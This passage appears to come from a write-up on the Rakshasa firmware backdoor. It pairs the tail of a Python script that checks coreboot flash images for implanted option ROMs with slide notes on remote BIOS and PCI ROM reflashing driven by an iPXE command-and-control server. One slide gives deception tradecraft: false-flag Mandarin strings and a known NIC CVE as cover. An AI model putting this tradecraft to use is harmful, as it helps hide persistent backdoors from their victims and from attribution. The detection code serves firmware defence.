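    entry += name.encode() + b"\0" + b"\0" * (offset - hdr_len) + data
    return entry + b"\xff" * (-len(entry) % align)   # erased-flash padding


# Constructed sample: a coreboot-style image that also carries an iPXE option ROM.
SAMPLE_IMAGE = (
    make_file("fallback/romstage", 0x10, b"\x90" * 100)
    + make_file("fallback/payload", 0x20, b"SeaBIOS" * 10)
    + make_file("pci8086,100e.rom", 0x30, b"\x55\xaa" + b"iPXE" * 20)
)

if __name__ == "__main__":
    report = verify(SAMPLE_IMAGE, "0" * 64)   # placeholder baseline: will not match
    print("sha256:", report["sha256"], "baseline match:", report["matches_baseline"])
    for name, ftype, length in report["files"]:
        print(f"  {name:24s} {CBFS_TYPES.get(ftype, hex(ftype)):10s} {length} bytes")
    print("suspicious:", report["suspicious"])
```

On a real case, `image` is the dump read with an external programmer from the chip itself, never an image the running BIOS hands you; the hash must be over the whole flash, not just the CBFS region, since Rakshasa also lives in PCI option ROMs outside it.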
58. Side note on remote flashing
BIOS flashing isn't a problem: the flasher (Linux based) is universal.
PCI ROM flashing is more of a problem: the flasher is vendor dependent.
How to solve this issue...?
59. Detecting network card manufacturer from the remote C&C
iPXE allows scripting. Eg: sending the MAC address as a URL parameter.
From the MAC, get the OUI number server side.
From the OUI number, deduce the manufacturer.
Send the proper flashing tool as an embedded OS to the backdoor...
61. Backdooring like a nation state
Rule #1: non-attribution
- you didn't write the free software in the first place.
- add a few misleading strings, eg: in Mandarin ;)
Rule #2: plausible deniability
- bootstrap with a known remote vulnerability in a network card firmware (eg: Duflot's CVE-2010-0104)
→ « honest mistake » if discovered.
- remotely flash the BIOS.
- do your evil thing.
- restore the BIOS remotely.
63. Booting an alternate OS from a Storage Area Network (SAN)
This is possible over a fast enough link (gigabit ethernet for instance).
64. Booting an alternate OS from a Storage Area Network (SAN)
#!ipxe
# fetch iso from SAN and boot
sanboot http://boot.ipxe.org/freedos/fdfullcd.iso
65. The fake problem of BIOS Graphics
- Coreboot supports adding a bootsplash if you know in advance what BIOS is targeted.
- SeaBIOS has a very minimal menu (wiped out in Rakshasa). Other payloads can have better menus.
Actually...
69. Outro
This is not a vulnerability:
- it is sheer bad design due to legacy.
- don't expect a patch.
- fixing those issues will probably require breaking backward compatibility with most standards (PCI, PCIe, TPM).